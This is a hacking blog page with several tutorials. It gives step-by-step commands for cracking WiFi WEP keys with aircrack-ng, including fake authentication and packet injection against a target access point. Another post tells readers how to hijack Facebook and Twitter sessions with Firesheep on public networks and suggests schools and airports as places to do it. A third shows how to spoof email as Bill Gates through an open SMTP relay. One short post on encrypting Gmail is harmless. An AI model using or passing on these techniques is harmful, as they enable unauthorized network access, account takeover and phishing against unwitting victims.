Cracking WEP Using Backtrack - WiFi Hacking Part 2

Cracking WEP Using Backtrack - WiFi Hacking Part 2

In my previous article WiFi Hacking Part 1, i wrote about the necessary tools and stuff  that you require for WiFi Hacking .If you have not read the article, please go through it before reading this one

In this article i will explain how you can crack wireless network's WEP key using Backtrack in six easy steps

WiFi Hacking Part 2
I believe all my blog readers have read the previous article WiFi Hacking Part 1, and know what are the tools and stuff that you require for WiFi hacking

Commonly Used Terms :- 

• WEP - Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
• Access Point (AP)- A wireless router
• MAC Address - Media Access Control address, a unique id assigned to wireless adapters and routers .It comes in hexadecimal format (ie 00:15:eR:21:a3:63)
• BSSID - Access Point’s MAC address
• ESSID - Access Point’s Broadcast name

Cracking WEP Using Backtrack

Step -1 Booting Backtrack

Boot your copy of Backtrack from your USB driveOnce booted you will be prompted for the login details, enter usename as "root" and password as "toor", finally enter "startx " to start backtrack .Now once you have logged in, launch a new konsole terminal by clicking the konsole terminal icon which is there on the task bar .Now plug in your Wifi usb card and type in the following commands in the terminal as shown

ifconfig wlan0 up

where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type" iwconfig "

Step -2 Putting your WiFi card on Monitor Mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air ,It is similar to a Promiscuous mode which is used for packet sniffing in a LAN .You can put your card into Monitor mode by entering the following commands in a terminal

airmon-ng  start (your interface)

Example :- airmon-ng  start wlan0

Now a new interface mon0 or ath0 will be created , You can see the new interface is in monitor mode by entering "iwconfig" as shown

Step -3  Monitor the air for WiFI connections 

Now after putting the card in monitor mode you will need to monitor the air for available wireless networks (WiFi connections)around  you , For this you'll have to use a tool called "airodump" .

So you can start monitoring the air with airodump by enter the following commands

airodump-ng  mon0

where mon0 is the new interface which we created in the previous step

Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type ,

Stop the process by pressing  "ctrl +c " and select your target  ,Since i am only cracking WEP  i will take "johny" as my target from now on

Step -4 Capturing Data with Airodump 

Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands

airodump-ng mon0 --bssid -c (channel ) -w (file name to save )

As my target is broadcasted in channel 2 and has bssid  "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "johnywep"

airodump-ng   mon0 --bssid  98:fc:11:c9:14:22   -c 2  -w  johnywep

Do not close this terminal (run the other commends simultaneously in an another terminal)


Step -5 Using Aireplay to Speed up the cracking  

You will have to capture at least 25,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets

The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets .

In an active attack  you'll have do a Fake authentication (connect) with the  AP ,then you'll have to generate and inject data packets.This can be done very easily by using a tool called "aireplay"

So you can do a Fake authentication with the AP using aireplay by entering the following commands in a new terminal

aireplay-ng - 1  3  -a (bssid fo the target )  (interface) 

In my case i enter the following

aireplay-ng -1 3  -a 98:fc:11:c9:14:22 mon0 

After doing a fake auth ,now its time to generate and inject Arp (data )packets . To this you'll have to open a terminal simultaneously and enter the following commands

aireplay-ng 3  -b (bssid of target)  -h ( address of your card (mon0))   (interface)

In my case i enter
aireplay-ng 3  -b 98:fc:11:c9:14:22   -h 00:c0:ca:50:f8:32 mon0

If this step was successful  you'll see Lot of data packets in the airodump capture ( step 4  ) as shown

Wait till it reaches at least 25000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the data packets  less the time to crack .once you captured enough number of packets, close all the process's by pressing "Ctrl +c" or by simply clicking the into mark which is there on the terminal

Strep -6 Cracking WEP  key using Aircrack 

Now its time crack the WEP key from the captured data, we use Aircrack to achieve this

Enter the following commands to crack the WEP key

aircrack-ng  (name of the captured file (step 4) )

In my case i enter 

aircrack-ng johnywep-0.1-cap

With in a few minutes Aircrak will crack the WEP key as shown

Voila you have successfully  cracked the WEP key in Six simple steps

continue reading Cracking WEP Using Backtrack - WiFi Hacking Part 2

Wifi Hacking - Part 1

Wifi Hacking - Part 1

As i promised i will be writing  some articles on WiFi (Wireless Network) hacking in the next few days , In this very first article i will list out a few  tools and  things that you require for WiFi Hacking

Wireless adapter
The biggest requirement you'll need is a wireless adapter that's capable of packet injection, there are many cards capable of injecting packets, You can search  Google for the compatibility list of WiFi cards

I use Alfa AWUS036H which is a very popular card and it performs well with Backtrack
                                                                                                                    

BackTrack Live Cd or Usb

Backtrack is a Linux distro with all  the essential tools required for penetration testing , I have already written  articles on how to make a backtrack live CD / USB ,If your new here i would recommend you to read the following articles to get a better understanding of what backtrack is and how you can use it 

• How to Install Backtrack - On Vmware
• How To Make a Bootable Backtrack CD / USB

continue reading Wifi Hacking - Part 1

Hack Facebook / Twitter accounts using Fire Sheep

Hack Facebook / Twitter accounts using Fire Sheep

In my Previous tutorial Hack Facebook /twitter accounts by stealing cookies we hacked Facebook book by side jacking i.e stealing cookies and injecting them in our browser . In this tutorial we will do the same by using a tool Fire sheep .This hack works when computers are connected in  a LAN (Local area network ) or when connected in public WiFi . Best place try out this hack is in schools , collages where computers are connected in LAN and in public places such as airports , hotels  where there's public WiFi



What is Fire Sheep
Fire sheep is an extension developed by Eric Butler for the Firefox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities. It shows the discovered identities on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim's name


Hack Facebook / Twitter accounts  using Fire Sheep

Thing we Need :

1. Firefox Browser

2. Fire sheep Firefox plugin 

Procedure :

1. First Download and install Firefox browser and Fire sheep add on

2. Open Firefox , Now click the (1) view button then select (2) side bar finally click(3) fire sheep or simply press ( ctrl + shift +s ) to open fire sheep

3. Now you can see fire sheep has opened up in the side bar Now select your interface by
 going to preferences as shown

4. Now click  on start capture button and wait for a while ,

5. Now you can see different pre- authenticated  sessions on the  side bar select the session which you want .

6. Now you will be automatically logged in the victims account . You can use this tool to hack Facebook/Twitter accounts

Note :- This Hack works only  when computers are in a LAN or WiFi  

Hope you enjoyed this tutorial . In my next article we will look at some of the countermeasures that we can take against these kind of attacks  .Till then have a nice time ........

continue reading Hack Facebook / Twitter accounts using Fire Sheep

How to Send Encrypted Mail through Gmail (Secure Gmail by Streak)

How to Send Encrypted Mail through Gmail (Secure Gmail by Streak)

Secure Gmail encrypts and decrypts emails you send in Gmail. This happens all on your machine, and the unencrypted text never reaches Google servers. This is useful if you don’t want anyone but the intended recipient to ever read your email (i.e. companies, governments, etc.)

First Install Secure Gmail by Streak plugin in your chrome browser from here

Now refresh your Gmail Click on the lock icon next to the compose button. 

Compose your email and send

Enter a password; your recipient will need to enter the same password.

To decrypt the email, your recipient will also need the Secure Gmail extension installed, as well as the password.

continue reading How to Send Encrypted Mail through Gmail (Secure Gmail by Streak)

Email spoofing: The story of “Congratulations you have won a lottery” like spam emails

Email spoofing: The story of “Congratulations you have won a lottery” like spam emails

Mail vs E-mail
Back in old days when internet was not so common, we had to rely only on the postal/courier services. The only thing that bugs me about the traditional mail is their speed. This is when email comes. It offers numerous benefits, like its blazing fast, most of the time its free,  you can attach from pictures to videos, from management point of view you don’t have to maintain a hard folder, last but not least its environment friendly. In short, email is one of the greatest inventions of all time.

What is a spam?

I’m not that old, but again back in those dial-up connection days, there was no such thing as Gmail, most of people either used Hotmail or Yahoo mail for the emails. The problem with these two email service providers is the spams. Spams are irrelevant emails coming to you, mostly used for marketing a product/service, but they are cases where spam emails have hacked a person through social engineering attack or session hijacking. Phishing is also associated with spoofed emails, phishing is “the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers“.

If you only use Gmail, you are a lucky person, because Google has got some very intelligent and sophisticated spam filtering mechanism. And frankly speaking I don’t get spams at all in my Gmail, but in case of Ymail or Hotmail … let’s just not talk about it.

What is e-mail spoofing?

In today’s article I will focus on Email spoofing. So, the first question you may ask is what is spoofing? Spoofing in simple terms is when Alice tries to be Bob. Email spoofing is when Alice sends an email to Eve but she keeps her identity to be Bob. When Eve receives an email she thinks that Bob has sent the email but it’s not. 

*PLEASE NOTE THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. GENERATING SPOOFED EMAILS OR SPAM IS ILLEGAL AND PUNISHABLE UNDER THE LAW. YOU WILL BE RESPONSIBLE FOR YOUR ACTIONS.*

Platform: Windows 7 (also works on MAC and Linux)

How to spoof an e-mail ?

There can be different ways of spoofing an email, but I am going to use “sendmail” program for it. Sendmail is a simple command line program used to send emails via SMTP protocol.

1. Go to Google and type “sendmail google code”. Open the page highlighted below.

2. This is what sendmail on google code looks like.

3. Go to the download section and download the appropriate file, as I m on windows so, I will be downloading the “.exe” file.

Open the command line and call the program “mailsend”. As soon as you type mailsend, the first thing it will ask for is SMTP server. This is a very critical part, if you don’t provide the right SMTP server your email will not be sent. You have to chose a SMTP server that doesn’t require authentication. I will be using PTCL’s SMTP server i.e “smtp.ptcl.com.pk“, this server runs on port 25.

Next in “from”, enter the email ID of the person you want to spoof, In this case I m making a spoof email of Bill Gates i.e “billgates@microsoft.com“

Provide the email id of receiver, I m giving my own email id.

Enter subject and then write your message, after you have completed your message.

Press enter, then press dot button and again press enter, a message will pop that your email has been sent.

Here you can see my inbox has got that spoofed email.

Inbox overview.

Author: This Article Written by Fowz Masood who has completed his bachelor’s in Electrical Engineering (Comp Engg) He is pursuing a master’s degree in Computer Communications and Security from SEECS-NUST, Pakistan. He has wide variety of interests Computer security/Network security

continue reading Email spoofing: The story of “Congratulations you have won a lottery” like spam emails